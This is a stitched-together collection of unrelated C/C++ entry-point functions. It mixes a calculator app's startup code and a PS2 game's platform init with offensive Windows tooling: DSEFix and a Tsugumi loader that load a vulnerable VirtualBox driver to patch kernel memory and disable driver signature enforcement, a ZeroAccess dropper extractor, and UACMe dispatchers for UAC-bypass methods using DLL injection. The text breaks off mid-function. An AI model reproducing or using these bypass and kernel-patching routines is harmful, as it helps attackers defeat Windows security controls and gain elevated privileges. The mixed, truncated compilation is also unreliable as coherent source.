// ---------------------------------------------------------------------
BOOL WinCoveredCalcApp::initInstance()
{
bool langFileLoaded = false;
if (!base::initInstance())
{
return FALSE;
}
// コモンコントロール初期化
::InitCommonControls();
// レイヤードウィンドウ関連の API
apiLayeredWindow.Initialize();
// ウェイトカーソルを取得しておく
waitCursor = ::LoadCursor(NULL, IDC_WAIT);
// モニタ情報を取得しておく
monitorInfo.Update();
// ベースクラス初期化
if (!init())
{
return FALSE;
}
// コマンドラインパラメータ解析
CommandLineParam* clParam = GetCommandLineParam();
clParam->SetParameter(__argc, __targv);
// 言語ファイルの読み込み
if (clParam->IsLangFileSpecified())
{
try
{
loadLangFile(clParam->GetLangFile());
langFileLoaded = true;
}
catch (Exception* ex)
{
ex->Delete();
// コマンドラインパラメータで指定された言語ファイルが読み込めなかったので無視します。
DoMessageBox(NSID_EMSG_LOAD_COMMANDLINE_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
}
}
// ウィンドウクラスの登録
WinMainWindow::RegisterClass();
//設定ファイルを準備
Path settingFile;
if (clParam->IsSettingFileSpecified())
{
// コマンドラインで設定ファイルが指定されていればそれを使う
settingFile.Assign(clParam->GetSettingFile());
}
else
{
// デフォルト設定ファイルを使う
try
{
readyDefaultSettingFilePath(settingFile);
}
catch (Exception* ex)
{
ExceptionMessageUtils::DoExceptionMessageBoxWithText(this, ex, NSID_EMSG_READY_DEFAULT_SETTING_FILE,
MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
ex->Delete();
return FALSE;
}
}
// 設定の読み込み
try
{
loadSettings(settingFile);
}
catch (Exception* ex)
{
ex->Delete();
return FALSE;
}
// 設定に保存された言語ファイルを読み込む
if (!langFileLoaded)
{
AppSettings* appSettings = GetAppSettings();
const Path settingPath = appSettings->GetLanguageFilePath();
if (!settingPath.IsEmpty()) {
Path langFileFullPath = MakeAbsoluteLangFilePath(settingPath);
if (!langFileFullPath.IsEmpty())
{
try
{
loadLangFile(langFileFullPath);
langFileLoaded = true;
}
catch (Exception* ex)
{
ex->Delete();
// 設定ファイルに書かれた言語ファイルが読めません。
DoMessageBox(NSID_EMSG_LOAD_SETTING_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
}
}
}
}
if (!langFileLoaded)
{
// 設定に保存されていなければ、ユーザーに問い合わせる
WinSelectLanguageDlg selectLangDlg;
try
{
selectLangDlg.SetRelativeLangFilePath(Path(ALITERAL("enUS.cclxw")));
int dlgResult = selectLangDlg.DoModal(NULL);
if (IDOK != dlgResult)
{
return FALSE;
}
}
catch (Exception* ex)
{
ExceptionMessageUtils::DoExceptionMessageBox(this, ex);
ex->Delete();
return FALSE;
}
Path langFilePath = selectLangDlg.GetRelativeLangFilePath();
Path langFileFullPath = MakeAbsoluteLangFilePath(langFilePath);
if (!langFileFullPath.IsEmpty())
{
try
{
loadLangFile(langFileFullPath);
langFileLoaded = true;
GetAppSettings()->SetLanguageFilePath(langFilePath);
}
catch (Exception* ex)
{
ex->Delete();
// 言語ファイルが読めません。
DoMessageBox(NSID_EMSG_LOAD_LANGFILE, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Warning);
}
}
}
// キー定義名 DB のロード
loadKeyNameDB();
// キーマッピング読み込み
loadKeyMappingsOnInit();
// カバー読み込み
try
{
AppSettings* appSettings = GetAppSettings();
loadCoverDef(appSettings->GetBaseFolder(), appSettings->GetLastCoverDef(), appSettings->GetLastCoverNo());
}
catch (Exception* ex)
{
ExceptionMessageUtils::DoExceptionMessageBox(this, ex);
ex->Delete();
// デフォルトカバーで復活を試みる
if (!restoreByDefaultCoverDef())
{
// ダメでした…。
return FALSE;
}
}
// メインウィンドウ生成
DWORD exStyle = 0;
if (GetAppSettings()->IsMainWindowAlwaysOnTop())
{
exStyle = WS_EX_TOPMOST;
}
const Point32& lastMainWindowPos = GetAppSettings()->GetLastMainWindowPos();
if (!mainWindow.CreateEx(exStyle, WinMainWindow::GetWindowClassName(), ALITERAL("CoveredCalc"), WS_SYSMENU | WS_POPUP | WS_MINIMIZEBOX, lastMainWindowPos.x, lastMainWindowPos.y, 0, 0, NULL, NULL))
{
// デフォルトカバーにして再チャレンジ
bool restored = false;
if (restoreByDefaultCoverDef())
{
if (mainWindow.CreateEx(exStyle, WinMainWindow::GetWindowClassName(), ALITERAL("CoveredCalc"), WS_SYSMENU | WS_POPUP | WS_MINIMIZEBOX, lastMainWindowPos.x, lastMainWindowPos.y, 0, 0, NULL, NULL))
{
restored = true;
}
}
if (!restored)
{
DoMessageBox(NSID_EMSG_CREATE_MAIN_WINDOW, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
return FALSE;
}
}
::ShowWindow(mainWindow.m_hWnd, SW_SHOW);
// カバーブラウザ生成
Path baseFolderPath = GetAppSettings()->GetBaseFolder();
if (baseFolderPath.IsEmpty())
{
baseFolderPath = getAppFolderPath();
}
coverBrowser.SetCoversFolderPath(baseFolderPath.Append(ALITERAL("Covers")));
if (!coverBrowser.Create(NULL))
{
DoMessageBox(NSID_EMSG_CREATE_COVER_BROWSER, MessageBoxProvider::ButtonType_OK, MessageBoxProvider::AlertType_Stop);
}
::ShowWindow(mainWindow.m_hWnd, SW_SHOW);
if (GetAppSettings()->IsCoverBrowserVisible())
{
::ShowWindow(coverBrowser.m_hWnd, SW_SHOW);
}
::SetForegroundWindow(mainWindow.m_hWnd);
return TRUE;
}
/*
* ldrMain
*
* Purpose:
*
* Program entry point.
*
*/
void ldrMain(
VOID
)
{
BOOL cond = FALSE;
LONG x;
ULONG l = 0, dwCmd;
HANDLE hDevice;
PVOID DataBuffer;
BOOL bConDisabled, bUsbMonDisabled;
WCHAR cmdLineParam[MAX_PATH + 1];
WCHAR szDriverBuffer[MAX_PATH * 2];
__security_init_cookie();
bConDisabled = FALSE;
bUsbMonDisabled = FALSE;
DataBuffer = NULL;
hDevice = NULL;
dwCmd = 0;
do {
//
// Check OS version.
//
RtlSecureZeroMemory(&g_osv, sizeof(g_osv));
g_osv.dwOSVersionInfoSize = sizeof(g_osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv);
//
// We support only Vista based OS.
//
if (g_osv.dwMajorVersion < 6) {
MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."),
T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Check number of instances running.
//
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
break;
}
//
// Check if any VBox instances are running, they must be closed before our usage.
//
if (supProcessExist(L"VirtualBox.exe")) {
MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."),
T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Query command line.
//
RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l);
if (l == 0) {
//
// Nothing in command line, simple display help and leave.
//
MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Check known command.
//
if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) {
dwCmd = TSMI_INSTALL;
}
else {
if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) {
dwCmd = TSMI_REMOVE;
}
}
if (dwCmd == 0) {
MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
break;
}
//
// Init ldr and DSEFix.
//
if (!ldrInit(dwCmd)) {
break;
}
//
// Process command.
//
switch (dwCmd) {
case TSMI_INSTALL:
// Backup vboxdrv if exists.
supBackupVBoxDrv(FALSE);
// Stop VBox Networking and USB driver.
bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE)));
bUsbMonDisabled = dsfStopDriver(VBoxUsbMon);
dsfStopDriver(VBoxDrvSvc);
// Load vulnerable VBoxDrv, disable VBox Network if exist.
RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
if (GetSystemDirectory(szDriverBuffer, MAX_PATH) == 0) {
MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."),
NULL, MB_ICONINFORMATION);
break;
}
_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));
hDevice = dsfLoadVulnerableDriver(szDriverBuffer);
if (hDevice) {
//
// Disable DSE so we can load monitor.
// Device handle closed by DSEFix routine.
//
if (ldrPatchDSE(hDevice, TRUE)) {
// Stop our VBoxDrv, need reloading for 2nd usage.
dsfStopDriver(VBoxDrvSvc);
// Load custom patch table, if present.
RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l);
if (l > 0) {
l = 0;
DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l);
if ((DataBuffer != NULL) && (l > 0)) {
g_TsmiPatchDataValue = DataBuffer;
g_TsmiPatchDataValueSize = l;
}
}
// Install and run monitor.
if (!ldrSetMonitor()) {
MessageBox(GetDesktopWindow(),
TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR);
}
// Enable DSE back.
hDevice = NULL;
if (dsfStartDriver(VBoxDrvSvc, &hDevice)) {
ldrPatchDSE(hDevice, FALSE);
}
}
else { //ldrPatchDSE failure case
// Unknown error during DSE disabling attempt.
MessageBox(GetDesktopWindow(),
TEXT("Error disabling DSE"), NULL, MB_ICONERROR);
}
// Finally, remove our vboxdrv file and restore backup.
dsfStopDriver(VBoxDrvSvc);
DeleteFile(szDriverBuffer);
supBackupVBoxDrv(TRUE);
// Restart installed VBoxDrv.
dsfStartDriver(VBoxDrvSvc, NULL);
}
else { //dsfLoadVulnerableDriver failure case.
// Load error, show error message and restore backup.
supBackupVBoxDrv(TRUE);
MessageBox(GetDesktopWindow(),
TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR);
}
break;
//
// Remove command, unload our driver and purge file/memory list cache.
//
case TSMI_REMOVE:
scmUnloadDeviceDriver(TsmiDrvName);
supPurgeSystemCache();
break;
}
} while (cond);
//
// Cleanup after install.
//
if (dwCmd == TSMI_INSTALL) {
// Re-enable VBox Network, UsbMonitor if they're disabled.
if (bConDisabled) {
supNetworkConnectionEnable(VBoxNetConnect, TRUE);
}
if (bUsbMonDisabled) {
dsfStartDriver(VBoxUsbMon, NULL);
}
// Free memory allocated for custom patch table.
if (DataBuffer != NULL) {
HeapFree(GetProcessHeap(), 0, DataBuffer);
}
}
InterlockedDecrement((PLONG)&g_lApplicationInstances);
ExitProcess(0);
return;
}
void Plat_Init(sint argc, char** argv)
{
gHardware=HARDWARE_UNDEFINED;
gGotExtraMemory=false;
gCD=false;
// must check to see if the supplied filename starts "cdrom0:\THPS4\" SLUS_207.31;1
// if the first real argument exists and starts with a digit, then assume
// that we are running from a bootstrap (as we will just have been passed the language in argv[1])
// and preempt any other parameters...
// so assume running on a regular PS2, from the CD
if (argc > 1)
{
if (argv[1][0] >= '0' && argv[1][0] <= '9')
{
printf ("argv[1][0] is a digit, so assuming bootstrap format, using \\thps4 directory\n");
gBootstrap=true;
gSonyBootstrap = true;
gHardware=HARDWARE_PS2;
gGotExtraMemory=false;
gCD=true;
// the rest we could, in theory, set from the sceLibDemo calls......
gLanguage=LANGUAGE_ENGLISH;
gTerritory=TERRITORY_UNDEFINED;
gDisplayType=DISPLAY_TYPE_NTSC;
gFPS=60;
return;
}
else
{
printf ("argv[1][0] (%s) is not digit, so it's a regular boot, using root\n",argv[1]);
}
}
else
{
printf ("no arguments, so it's a regular boot, using root\n");
}
// If the filename ends in .elf, then extract out the name
// c:\skate5\build\NGPSgnu\local.elf
if (stricmp(argv[0]+strlen(argv[0])-4,".elf")==0)
{
char *p = argv[0]+strlen(argv[0])-5; // letter before the .elf
while (*p != '\\') p--;
p++; // first letter of the name
char *q = &s_elf_name[0];
while (*p != '.') *q++ = *p++;
*q++ = 0;
}
if (!argv[0] || stricmp(argv[0]+strlen(argv[0])-4,".elf")==0)
{
gHardware=HARDWARE_PS2_DEVSYSTEM;
gGotExtraMemory=true;
gCD=false;
}
else
{
// It's just a normal PS2
gHardware=HARDWARE_PS2;
gGotExtraMemory=false;
gCD=true;
}
// Check command line to see if they're using ProView
if (snputs("Plat_Init detected ProView ...\n")!=-1)
{
gHardware=HARDWARE_PS2_PROVIEW;
gGotExtraMemory=false;
gCD=false;
}
// Check command line to see if they want to force gGotExtraMemory on or off
if (CommandLineContainsFlag("GotExtraMemory",argc,argv))
{
gGotExtraMemory=true;
}
if (CommandLineContainsFlag("NoExtraMemory",argc,argv))
{
gGotExtraMemory=false;
}
// Detect the language from the product code.
gLanguage=LANGUAGE_ENGLISH;
gpMemCardHeader=NGPS_NTSC;
if (argv[0])
{
// Doing a stricmp just in case it changes to be CDROM later or something.
if (stricmp(argv[0],sGenerateElfName(NGPS_NTSC))==0)
{
gLanguage=LANGUAGE_ENGLISH;
gpMemCardHeader=NGPS_NTSC;
}
else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_ENGLISH))==0)
{
gLanguage=LANGUAGE_ENGLISH;
gpMemCardHeader=NGPS_PAL_ENGLISH;
}
else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_FRENCH))==0)
{
gLanguage=LANGUAGE_FRENCH;
gpMemCardHeader=NGPS_PAL_FRENCH;
}
else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_GERMAN))==0)
{
gLanguage=LANGUAGE_GERMAN;
gpMemCardHeader=NGPS_PAL_GERMAN;
}
else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_ITALIAN))==0)
{
gLanguage=LANGUAGE_ITALIAN;
gpMemCardHeader=NGPS_PAL_ITALIAN;
}
else if (stricmp(argv[0],sGenerateElfName(NGPS_PAL_SPANISH))==0)
{
gLanguage=LANGUAGE_SPANISH;
gpMemCardHeader=NGPS_PAL_SPANISH;
}
}
// They may want to force the language to be something else from the command line ...
const char *p_language=GetCommandLineParam("Language",argc,argv);
if (p_language)
{
if (stricmp(p_language,"English")==0)
{
gLanguage=LANGUAGE_ENGLISH;
gpMemCardHeader=NGPS_NTSC;
}
else if (stricmp(p_language,"French")==0)
{
gLanguage=LANGUAGE_FRENCH;
gpMemCardHeader=NGPS_PAL_FRENCH;
}
else if (stricmp(p_language,"German")==0)
{
gLanguage=LANGUAGE_GERMAN;
gpMemCardHeader=NGPS_PAL_GERMAN;
}
else if (stricmp(p_language,"Italian")==0)
{
gLanguage=LANGUAGE_ITALIAN;
gpMemCardHeader=NGPS_PAL_ITALIAN;
}
else if (stricmp(p_language,"Spanish")==0)
{
gLanguage=LANGUAGE_SPANISH;
gpMemCardHeader=NGPS_PAL_SPANISH;
}
else
{
Dbg_MsgAssert(0,("Language '%s' not supported",p_language));
}
}
gTerritory=TERRITORY_UNDEFINED;
gDisplayType=DISPLAY_TYPE_NTSC;
gFPS=60;
// Figure out if it is PAL from the product code ...
if (argv[0])
{
char p_temp[50];
strncpy(p_temp,argv[0],12);
p_temp[12]=0; // strncpy won't terminate
// Doing a stricmp just in case it changes to be CDROM later or something.
if (stricmp(p_temp,"cdrom0:\\SLES")==0)
{
gDisplayType=DISPLAY_TYPE_PAL;
gFPS=50;
}
}
}
void main()
{
LONG x;
ULONG ParamLen;
HANDLE hDevice = NULL;
WCHAR cmdLineParam[MAX_PATH + 1];
BOOL bDisable = TRUE, cond = FALSE;
__security_init_cookie();
//
// Output DSEFix banner.
//
ShowServiceMessage("DSEFix v1.1.0 started");
ShowServiceMessage("(c) 2014 - 2015 DSEFix Project");
ShowServiceMessage("Supported x64 OS : Vista / 7 / 8 / 8.1 / 10");
do {
//
// Check single instance.
//
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
ShowServiceMessage("Another instance running, close it before");
break;
}
//
// Check supported OS.
//
RtlSecureZeroMemory(&osv, sizeof(osv));
osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
if (osv.dwMajorVersion < 6) {
ShowServiceMessage("Unsupported OS");
break;
}
//
// Query command line parameters.
//
ParamLen = 0;
RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &ParamLen);
if (_strcmpi(cmdLineParam, TEXT("-e")) == 0) {
ShowServiceMessage("DSE will be (re)enabled");
bDisable = FALSE;
}
else {
ShowServiceMessage("DSE will be disabled");
bDisable = TRUE;
}
//
// Load vulnerable driver and open it device.
//
hDevice = LoadVulnerableDriver();
if (hDevice == NULL) {
ShowServiceMessage("Failed to load vulnerable driver");
break;
}
else {
ShowServiceMessage("Vulnerable VirtualBox driver loaded");
}
//
// Manipulate kernel variable.
//
if (DoWork(hDevice, bDisable)) {
ShowServiceMessage("Kernel memory patched");
}
else {
ShowServiceMessage("Failed to patch kernel memory");
}
//
// Do basic cleanup.
//
ShowServiceMessage("Cleaning up");
UnloadVulnerableDriver();
ShowServiceMessage("Finish");
} while (cond);
InterlockedDecrement((PLONG)&g_lApplicationInstances);
ExitProcess(0);
}
/*
* SfExtractDropper
*
* Purpose:
*
* Extract Sirefef/ZeroAccess from image resource.
*
* CNG variant
*
*/
UINT SfExtractDropper(
LPWSTR lpCommandLine
)
{
BOOL cond = FALSE, bSuccess = FALSE;
ULONG c, uKey = 0, imagesz;
WCHAR szInputFile[MAX_PATH + 1];
WCHAR szOutputFile[MAX_PATH + 1];
WCHAR szKey[MAX_PATH];
PVOID ImageBase = NULL, EncryptedData = NULL, DecryptedData = NULL;
IStream *pImageStream = NULL;
ULONG_PTR gdiplusToken = 0;
GdiplusStartupInput input;
GdiplusStartupOutput output;
PVOID BitmapPtr = NULL;
GdiPlusBitmapData BitmapData;
GdiPlusRect rect;
SIZE_T sz;
PULONG ptr, i_ptr;
//input file
c = 0;
RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
if (c == 0) {
SfcuiPrintText(g_ConOut,
T_SFEXTRACTUSAGE,
g_ConsoleOutput, FALSE);
return (UINT)-1;
}
//output file
c = 0;
RtlSecureZeroMemory(&szOutputFile, sizeof(szOutputFile));
GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szOutputFile, MAX_PATH, &c);
if (c == 0) {
_strcpy(szOutputFile, TEXT("extracted.bin"));
}
//key
c = 0;
RtlSecureZeroMemory(&szKey, sizeof(szKey));
GetCommandLineParam(lpCommandLine, 3, (LPWSTR)&szKey, MAX_PATH, &c);
if ((c == 0) || (c > 10)) {
SfcuiPrintText(g_ConOut,
T_SFEXTRACTUSAGE,
g_ConsoleOutput, FALSE);
return (UINT)-1;
}
c = 0;
if (locase_w(szKey[1]) == 'x') {
c = 2;
}
uKey = hextoul(&szKey[c]);
do {
ImageBase = SfuCreateFileMappingNoExec(szInputFile);
if (ImageBase == NULL)
break;
c = 0;
EncryptedData = SfLdrQueryResourceData(1, ImageBase, &c);
if ((EncryptedData == NULL) || (c == 0))
break;
pImageStream = SHCreateMemStream((BYTE *)EncryptedData, (UINT)c);
if (pImageStream == NULL)
break;
RtlSecureZeroMemory(&input, sizeof(input));
RtlSecureZeroMemory(&output, sizeof(output));
input.GdiplusVersion = 1;
if (GdiplusStartup(&gdiplusToken, &input, &output) != GdiplusOk)
break;
BitmapPtr = NULL;
if (GdipCreateBitmapFromStream(pImageStream, &BitmapPtr) != GdiplusOk)
break;
RtlSecureZeroMemory(&rect, sizeof(rect));
if (
(GdipGetImageWidth(BitmapPtr, (UINT *)&rect.Width) == GdiplusOk) &&
(GdipGetImageHeight(BitmapPtr, (UINT *)&rect.Height) == GdiplusOk)
)
{
RtlSecureZeroMemory(&BitmapData, sizeof(BitmapData));
if (GdipBitmapLockBits(BitmapPtr, &rect, ImageLockModeRead, PixelFormat32bppARGB, &BitmapData) == GdiplusOk) {
c = (rect.Width * rect.Height);
imagesz = sizeof(ULONG) * c;
sz = imagesz;
DecryptedData = NULL;
NtAllocateVirtualMemory(NtCurrentProcess(), &DecryptedData, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (DecryptedData) {
i_ptr = (PULONG)BitmapData.Scan0;
ptr = DecryptedData;
while (c > 0) {
*ptr = *i_ptr ^ uKey;
ptr++;
i_ptr++;
c--;
}
bSuccess = (SfuWriteBufferToFile(szOutputFile, DecryptedData, imagesz, FALSE, FALSE) == imagesz);
sz = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &DecryptedData, &sz, MEM_RELEASE);
}
GdipBitmapUnlockBits(BitmapPtr, &BitmapData);
}
}
} while (cond);
if (bSuccess == FALSE) {
SfcuiPrintText(g_ConOut,
T_SFEXTRACTFAIL,
g_ConsoleOutput, FALSE);
}
else
{
SfcuiPrintText(g_ConOut,
szOutputFile,
g_ConsoleOutput, TRUE);
SfcuiPrintText(g_ConOut,
T_SFEXTRACTED,
g_ConsoleOutput, TRUE);
}
if (BitmapPtr != NULL) {
GdipDisposeImage(&BitmapPtr);
}
if (gdiplusToken != 0) {
GdiplusShutdown(gdiplusToken);
}
if (pImageStream != NULL) {
pImageStream->lpVtbl->Release(pImageStream);
}
if (ImageBase != NULL) {
NtUnmapViewOfSection(NtCurrentProcess(), ImageBase);
}
return 0;
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
BOOL IsWow64 = FALSE;
DWORD bytesIO, dwType;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
RTL_OSVERSIONINFOW osver;
//verify system version
RtlSecureZeroMemory(&osver, sizeof(osver));
osver.dwOSVersionInfoSize = sizeof(osver);
RtlGetVersion(&osver);
if (osver.dwBuildNumber < 7000) {
MessageBox(GetDesktopWindow(),
TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
goto Done;
}
if (ElevType != TokenElevationTypeLimited) {
MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
IsWow64 = supIsProcess32bit(GetCurrentProcess());
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
dwType = METHOD_SYSPREP;
}
if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
dwType = METHOD_SYSPREP_EX;
}
if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
dwType = METHOD_OOBE;
}
#ifndef _WIN64
if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
dwType = METHOD_APPCOMPAT;
}
#endif
if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
dwType = METHOD_SIMDA;
}
if (lstrcmpi(szBuffer, TEXT("6")) == 0) {
OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r"));
dwType = METHOD_CARBERP;
}
if (lstrcmpi(szBuffer, TEXT("7")) == 0) {
OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r"));
dwType = METHOD_CARBERP_EX;
}
}
if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"),
PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
switch (dwType) {
case METHOD_SYSPREP:
case METHOD_SYSPREP_EX:
case METHOD_OOBE:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
}
break;
//
// There is no RedirectEXE for x64.
//
#ifndef _WIN64
case METHOD_APPCOMPAT:
if (ucmAppcompatElevation()) {
OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
}
break;
#endif
case METHOD_SIMDA:
//
// Since we are using injection and not using heavens gate, we should ban usage under wow64.
//
#ifndef _DEBUG
if (IsWow64) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
#endif
if (MessageBox(GetDesktopWindow(),
TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
{
if (ucmSimdaTurnOffUac()) {
OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
}
}
break;
case METHOD_CARBERP:
case METHOD_CARBERP_EX:
if (dwType == METHOD_CARBERP) {
if (osver.dwBuildNumber > 9600) {
MessageBoxW(GetDesktopWindow(),
TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
//there is no migmiz in syswow64 in 8+
if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
MessageBoxW(GetDesktopWindow(),
WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
goto Done;
}
}
if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
}
break;
}
Done:
ExitProcess(0);
}
/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
*/
UINT ucmMain()
{
DWORD bytesIO, dwType, paramLen;
WCHAR *p;
WCHAR szBuffer[MAX_PATH + 1];
TOKEN_ELEVATION_TYPE ElevType;
if (ucmInit() != ERROR_SUCCESS) {
return ERROR_INTERNAL_ERROR;
}
//query windows version
if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) {
ucmShowMessage(TEXT("This Windows is unsupported."));
return ERROR_NOT_SUPPORTED;
}
ElevType = TokenElevationTypeDefault;
if (!supGetElevationType(&ElevType)) {
return ERROR_INVALID_ACCESS;
}
if (ElevType != TokenElevationTypeLimited) {
ucmShowMessage(TEXT("Admin account with limited token required."));
return ERROR_NOT_SUPPORTED;
}
dwType = 0;
bytesIO = 0;
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO == 0) {
return ERROR_INVALID_DATA;
}
dwType = strtoul(szBuffer);
switch (dwType) {
case METHOD_SYSPREP1://cryptbase
if (g_ldp.osver.dwBuildNumber > 9200) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_SYSPREP2://shcore
if (g_ldp.osver.dwBuildNumber != 9600) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_SYSPREP3://dbgcore
if (g_ldp.osver.dwBuildNumber != 10240) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_OOBE://oobe service
if (g_ldp.osver.dwBuildNumber >= 10548) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_REDIRECTEXE:
if (g_ldp.osver.dwBuildNumber > 9600) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
#ifdef _WIN64
ucmShowMessage(WOW64WIN32ONLY);
return ERROR_UNSUPPORTED_TYPE;
#endif
break;
case METHOD_SIMDA:
if (g_ldp.osver.dwBuildNumber >= 10136) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_CARBERP:
if (g_ldp.osver.dwBuildNumber >= 10147) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_CARBERP_EX:
if (g_ldp.osver.dwBuildNumber >= 10147) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_TILON:
if (g_ldp.osver.dwBuildNumber > 9200) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_AVRF:
if (g_ldp.osver.dwBuildNumber >= 10136) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_WINSAT:
if (g_ldp.osver.dwBuildNumber >= 10548) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_SHIMPATCH:
if (g_ldp.osver.dwBuildNumber > 9600) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
#ifdef _WIN64
ucmShowMessage(WOW64WIN32ONLY);
return ERROR_UNSUPPORTED_TYPE;
#endif
break;
case METHOD_MMC:
break;
case METHOD_H1N1:
if (g_ldp.osver.dwBuildNumber >= 10548) {
if (ucmShowQuestion(UACFIX) == IDNO)
return ERROR_UNSUPPORTED_TYPE;
}
break;
case METHOD_GENERIC:
break;
}
//prepare command for payload
